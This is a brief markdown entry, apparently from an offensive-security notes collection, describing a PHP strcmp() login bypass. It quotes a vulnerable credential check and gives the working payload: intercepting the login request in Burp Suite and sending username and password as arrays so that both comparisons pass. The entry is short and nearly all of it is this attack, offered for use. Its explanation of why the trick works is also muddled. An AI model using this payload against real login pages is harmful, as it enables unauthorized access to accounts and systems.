killchain-compendium/Exploits/Web/PHP strcmp.md

PHP strcmp() bypass

Given a strcmp() of a variable and a POST parameter value that looks like this

[...]
if (strcmp($username, $_POST['username']) == 0) {
    if (strcmp($password, $_POST['password']) == 0) {   
[...]

If $username and $password are an array, sending a POST value as an array too will evaluate both strcmp() to 0. Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from

username=admin&password=admin

to

username[]=admin&password[]=admin